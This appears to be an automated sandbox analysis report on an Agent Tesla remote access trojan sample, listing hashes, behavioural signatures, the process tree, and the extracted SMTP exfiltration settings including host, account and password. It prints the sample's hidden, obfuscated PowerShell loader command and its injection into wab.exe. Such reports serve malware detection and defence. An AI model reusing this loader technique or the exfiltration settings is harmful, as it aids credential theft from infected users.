Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 12:32
Static task
static1
Behavioral task
behavioral1
Sample
doc023571961500.exe
Resource
win7-20240221-en
General
-
Target
doc023571961500.exe
-
Size
708KB
-
MD5
1fdc4210c29446f1358360b7df89eb3e
-
SHA1
feabe794bd8654ceaa0d2a2588b252fed6cae378
-
SHA256
8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c
-
SHA512
4f30ad8c74e270d7cc88f3de29fd9a2530a378b07cd5efce7867e19e007472f89da0b6a1fcc97871f4b3e16d65513369b6c34f6e4144983afcebfe35965e337a
-
SSDEEP
12288:QuoS1Rnqm/L+toFP3ke8cfDynok2l19jjk9CTe13c:HT1Rqm/kol3Kn619k+
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
sslout.de - Port:
587 - Username:
[email protected] - Password:
dataset123 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 34 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 3652 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 4156 powershell.exe 3652 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4156 set thread context of 3652 4156 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exewab.exepid process 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 4156 powershell.exe 3652 wab.exe 3652 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 4156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 3652 wab.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
doc023571961500.exepowershell.exedescription pid process target process PID 4220 wrote to memory of 4156 4220 doc023571961500.exe powershell.exe PID 4220 wrote to memory of 4156 4220 doc023571961500.exe powershell.exe PID 4220 wrote to memory of 4156 4220 doc023571961500.exe powershell.exe PID 4156 wrote to memory of 1796 4156 powershell.exe cmd.exe PID 4156 wrote to memory of 1796 4156 powershell.exe cmd.exe PID 4156 wrote to memory of 1796 4156 powershell.exe cmd.exe PID 4156 wrote to memory of 3652 4156 powershell.exe wab.exe PID 4156 wrote to memory of 3652 4156 powershell.exe wab.exe PID 4156 wrote to memory of 3652 4156 powershell.exe wab.exe PID 4156 wrote to memory of 3652 4156 powershell.exe wab.exe PID 4156 wrote to memory of 3652 4156 powershell.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\doc023571961500.exe"C:\Users\Admin\AppData\Local\Temp\doc023571961500.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Induktionen=Get-Content 'C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Rykkerbrev.Rin';$Noncredibility=$Induktionen.SubString(54173,3);.$Noncredibility($Induktionen)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:1796
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
318KB
MD5f7fdc5a99007f4b2f31937dd8205c668
SHA16a08dffb90f21565641c0660b444ecbffc875fb0
SHA25662c4dabf9dac154bf2d18d42cc1c72944d5e69109d9367211a89580ba6760583
SHA512f0cca3d85832339233259e9d8f37ccc570faca62f26fd5554c0e1415e5368c1afacbe83039124927651ff33bb260a9c604912073ff3fe258f9036091afb92980
-
Filesize
52KB
MD58feef5a2d2851a6927d27a3cdb9ef266
SHA1951b7b70b5523c1a2252d2924b03335d92e73912
SHA256df187dabada995e329a11f1d8eed38813eb43509252597db7e67706287be95a5
SHA512458ee8fc14f094352d2e3c67e4ce7d452a0b6e5041898f2b852920e90c621665f22f53f09a56972db23e4b3c12e390c589292c4fd2777d5a0f36495ba1b2e578